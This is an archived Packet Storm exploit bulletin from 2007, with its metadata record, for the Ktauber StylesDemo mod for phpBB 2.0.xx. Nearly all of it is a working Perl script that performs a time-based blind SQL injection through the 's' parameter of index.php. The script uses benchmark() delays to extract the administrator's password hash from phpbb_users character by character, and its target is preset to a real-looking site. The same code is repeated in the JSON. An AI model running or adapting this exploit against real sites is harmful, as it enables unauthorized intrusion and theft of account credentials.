ID PACKETSTORM:59406
Type packetstorm
Reporter inj3ct-it.org
Modified 2007-09-19T00:00:00
Description
`#---------------------------------------------------------------
# ____ __________ __ ____ __
#/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
# | | | \ | |/ \ \___| | /_____/ | || |
# |___|___| /\__| /______ /\___ >__| |___||__|
# \/\______| \/ \/
#---------------------------------------------------------------
#
#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
#
#--------------------------------------------------------------
#
#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites
#
#---------------------------------------------------------------
#
# Coded by nexen
#
# GreetZ: Rossi46go for code
#
# Description:
#
#XSS and SQL Injection
#
#---------------------------------------------------------------
#
#
#
#
#---------------------------------------------------------------
#exploit.pl
#---------------------------------------------------------------
#
#
#
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################
$sito = "http://www.forumup.com/stylesdemo/"; # insert vulnerable site as http://[site]/[path]/
##########################################################################################################################################
$var = "1";
my $hash;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
sub richiesta {
$var = $_[0];
$ua = LWP::UserAgent->new;
$inizio=Time::HiRes::time();
$response = $ua->request(GET $var,
s => $var);
$response->is_success() || print("$!\n");
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}
sub aggiorna{
system("cls");
print "Tempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}
#print richiesta;
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{
$var=$sito."index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*";
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}
print "Attacco Terminato\n\n";
system("pause");
`
{"id": "PACKETSTORM:59406", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpbbstyles-sql.txt", "description": "", "published": "2007-09-19T00:00:00", "modified": "2007-09-19T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/59406/phpbbstyles-sql.txt.html", "reporter": "inj3ct-it.org", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:08", "viewCount": 4, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:20:08", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:08", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/59406/phpbbstyles-sql.txt", "sourceData": "`#--------------------------------------------------------------- \n# ____ __________ __ ____ __ \n#/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \n# | |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\ \n# | | | \\ | |/ \\ \\___| | /_____/ | || | \n# |___|___| /\\__| /______ /\\___ >__| |___||__| \n# \\/\\______| \\/ \\/ \n#--------------------------------------------------------------- \n# \n#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org \n# \n#-------------------------------------------------------------- \n# \n#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites \n# \n#--------------------------------------------------------------- \n# \n# Coded by nexen \n# \n# GreetZ: Rossi46go for code \n# \n# Description: \n# \n#XSS and SQL Injection \n# \n#--------------------------------------------------------------- \n# \n# \n# \n# \n#--------------------------------------------------------------- \n#exploit.pl \n#--------------------------------------------------------------- \n# \n# \n# \nuse LWP::UserAgent; \nuse HTTP::Request::Common; \nuse Time::HiRes; \n######################################## CONFIGURAZIONE EXPLOIT ########################################################################## \n$sito = \"http://www.forumup.com/stylesdemo/\"; # insert vulnerable site as http://[site]/[path]/ \n########################################################################################################################################## \n$var = \"1\"; \nmy $hash; \n@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); \n \nsub richiesta { \n$var = $_[0]; \n$ua = LWP::UserAgent->new; \n$inizio=Time::HiRes::time(); \n$response = $ua->request(GET $var, \ns => $var); \n$response->is_success() || print(\"$!\\n\"); \n$fine=Time::HiRes::time(); \n$tempo=$fine-$inizio; \nreturn $tempo \n} \n \nsub aggiorna{ \nsystem(\"cls\"); \nprint \"Tempo sql : \" . $_[4] . \" secondi\\n\"; \nprint \"Hash : \" . $_[3] . \"\\n\"; \n} \n \n#print richiesta; \n \nfor ($i=1;$i<33;$i++) \n{ \nfor ($j=0;$j<16;$j++) \n{ \n \n$var=$sito.\"index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,\".$i.\",1))=\".$array[$j].\"),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*\"; \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$hash .=chr($array[$j]); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \n$j=200; \n} \n} \n \n} \nif($i==1) \n{ \nif($hash eq \"\") \n{ \n$i=200; \nprint \"Attacco Fallito Sito Fixato\\n\"; \n} \n} \n} \n \n \nprint \"Attacco Terminato\\n\\n\"; \n \nsystem(\"pause\"); \n`\n", "immutableFields": []}
{}